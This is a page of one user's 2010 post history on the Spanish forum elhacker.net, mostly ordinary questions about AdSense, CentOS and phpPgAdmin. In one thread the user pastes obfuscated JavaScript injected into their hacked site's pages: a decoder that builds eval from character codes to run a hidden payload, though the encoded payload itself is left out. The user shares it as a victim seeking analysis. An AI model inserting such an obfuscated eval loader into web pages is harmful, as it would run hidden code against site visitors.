elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: ¿Eres nuevo? ¿Tienes dudas acerca del funcionamiento de la comunidad? Lee las Reglas Generales


  Mostrar Mensajes
Páginas: 1 ... 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 [22] 23 24 25 26 27 28 29
211  Seguridad Informática / Nivel Web / Re: virus en archivo html? / y algunos php en: 13 Noviembre 2010, 16:35 pm
t agrade zco mucho tu tiem´po, de veras ;-) tiene´s idea de como pudo infectarse? o que carajos puede hacer ese codigo?...

pd. no ocnozco mas de ese codigo, por ahora es l o unico que tengo, permite me buscar mas ;)
212  Seguridad Informática / Nivel Web / Re: virus en archivo html? / y algunos php en: 12 Noviembre 2010, 22:45 pm
tenes a lgo? es que m´e preocup´a bastante y no se si sea alarmante
213  Seguridad Informática / Nivel Web / Re: virus en archivo html? / y algunos php en: 12 Noviembre 2010, 02:23 am
Uyy que bueno, por fav or informame de los resultados que obtienes :/ and o algo preo cupad o
214  Seguridad Informática / Nivel Web / virus en archivo html? / y algunos php en: 11 Noviembre 2010, 21:40 pm
Hola... parece que hackearon un sitio que tenia, nada importante pero me preocupa, es de un VPS asi que tengo todos los permisos, tiene cpanel instalado...

en mis archivos index o home aparecieron de la nada estos codigos js:
Citar
<script language="javascript">
var kasbd3412 = "";
$$ = function () { try{kasbd3412= $$dfsd(gnflseejrr()); kasbd3412.do(); } catch(e){ var bn = ""; return kasbd3412;}};
var adlan3r$oubw = "e";$$dfsd =  this['a'+'s'+'d'];var adlan3r$ouaw = "a";
function asd(df_){this['r']="";
var s = df_;
for(__fh=0;this['__fh']<s['l'+adlan3r$oubw+'ng'+'t'+'h'];__fh++ ){i=__fh;if(s['ch'+adlan3r$ouaw +'rA'+'t'](i)=='Z'){this[neAR_DEF_FGEvftDSyTtnSoh_1]='%'} else {this[neAR_DEF_FGEvftDSyTtnSoh_1]=s['ch'+'ar'+'At'](this['i'])}this['r']=r+VAR_EZJrWcTGuhPYZJj(this,neAR_DEF_FGEvftDSyTtnSoh_1)}
return this['unesc'+adlan3r$ouaw + 'p'+adlan3r$oubw](r)}
var ez=window
VAR_AiCzwbiiMdphDXs=(function(VAR_JMFILTCeLQNWkAf,VAR_gqWQtFFAsjjtVqK){return VAR_JMFILTCeLQNWkAf[VAR_gqWQtFFAsjjtVqK];
});
VAR_EZJrWcTGuhPYZJj=(function(VAR_wiSIHKenjOMRPsE,VAR_SfXtSSNCWJXwgQF){return VAR_AiCzwbiiMdphDXs(VAR_wiSIHKenjOMRPsE,VAR_SfXtSSNCWJXwgQF);
});
function gnflseejrr() {return $a}var neAR_DEF_FGEvftDSyTtnSoh_1='s'+'1'; BKbk34b32=

Mas abajo luego de mas codigo.
Citar
var $a = BKbk34b32.replace(/98/g, "Z");
ez[String.fromCharCode(101,118,97)+'l']($$())
</script>
<script language="javascript">
var kasbd3412 = "";
$$ = function () { try{kasbd3412= $$dfsd(gnflseejrr()); kasbd3412.do(); } catch(e){ var bn = ""; return kasbd3412;}};
var adlan3r$oubw = "e";$$dfsd =  this['a'+'s'+'d'];var adlan3r$ouaw = "a";
function asd(df_){this['r']="";
var s = df_;
for(__fh=0;this['__fh']<s['l'+adlan3r$oubw+'ng'+'t'+'h'];__fh++ ){i=__fh;if(s['ch'+adlan3r$ouaw +'rA'+'t'](i)=='Z'){this[neAR_DEF_FGEvftDSyTtnSoh_1]='%'} else {this[neAR_DEF_FGEvftDSyTtnSoh_1]=s['ch'+'ar'+'At'](this['i'])}this['r']=r+VAR_EZJrWcTGuhPYZJj(this,neAR_DEF_FGEvftDSyTtnSoh_1)}
return this['unesc'+adlan3r$ouaw + 'p'+adlan3r$oubw](r)}
var ez=window
VAR_AiCzwbiiMdphDXs=(function(VAR_JMFILTCeLQNWkAf,VAR_gqWQtFFAsjjtVqK){return VAR_JMFILTCeLQNWkAf[VAR_gqWQtFFAsjjtVqK];
});
VAR_EZJrWcTGuhPYZJj=(function(VAR_wiSIHKenjOMRPsE,VAR_SfXtSSNCWJXwgQF){return VAR_AiCzwbiiMdphDXs(VAR_wiSIHKenjOMRPsE,VAR_SfXtSSNCWJXwgQF);
});
function gnflseejrr() {return $a}var neAR_DEF_FGEvftDSyTtnSoh_1='s'+'1'; BKbk34b32=

Sigue mas y mas codigo hasta que acaba:
Citar
var $a = BKbk34b32.replace(/98/g, "Z");
ez[String.fromCharCode(101,118,97)+'l']($$())
</script>

Que podra ser?
215  Foros Generales / Foro Libre / Que es un crédito o facturación <prorrata>? en: 16 Septiembre 2010, 00:37 am
Pues foreros, me preguntaba que es ese concepto de prorrata, aplicado pues a facturar, créditos y demás...

Que es que me facturen algo a prorrata? :P

gracias!
216  Programación / Desarrollo Web / Re: Alguien me explica lo de Google adsense? en: 19 Agosto 2010, 16:01 pm
¿Como cuales pagan por impresiones? :P (aparte de exponsor, gracias por el dato ;))
217  Programación / Desarrollo Web / Alguien me explica lo de Google adsense? en: 18 Agosto 2010, 19:48 pm
Que son estos conceptos del panel de adsense?

Impresiones de página   
Clics   CTR de la página   
eCPM de la página
Ingresos estimados

A google no le entiendo realmente xD... las impresiones son las mismas visitas diarias? y el CTR qué es?... veo herramientas como http://www.seochat.com/?go=1&option=com_seotools&tool=24 que me preguntan esos datos de adsense pero no sabría que colocar para obtener una estadística... en una página por ejemplo donde todos los visitantes dan click, cuanto da en Click Through Rate (%)?

Saludos!
218  Sistemas Operativos / GNU/Linux / Instalador de CentOS 5.5 LiveCD? en: 10 Agosto 2010, 00:53 am
Holas,

Es que tengo que instalar Centos 5.5 ya que necesito hacer varias pruebas de un software antes de comprarlo (que corre bajo Centos) entonces buscaba alguna forma de instalar el CentOS 5.5 desde el LiveCD, es esto posible?
Alguno podría ayudarme? no encuentro mucha informacion en la web :P o tal vez es muchísima..
219  Programación / Desarrollo Web / problema con php y phppgadmin en: 11 Julio 2010, 04:03 am
hola, es que instalo el modulo de postgresql y todo va bien pero cuando accedo a phpPgAdmin me dice:

Su versión de PHP no tiene el soporte correcto de bases de datos.

Tengo isntalado soporte para php4 y php5, habrá alguna confusion por esto?
220  Foros Generales / Foro Libre / Re: Para todos ustedes en: 10 Julio 2010, 05:19 am
Pff como no diferencian? :P yo siempre noté que era una mujer jeje... no entiendo es el punto del video xP
Páginas: 1 ... 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 [22] 23 24 25 26 27 28 29
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines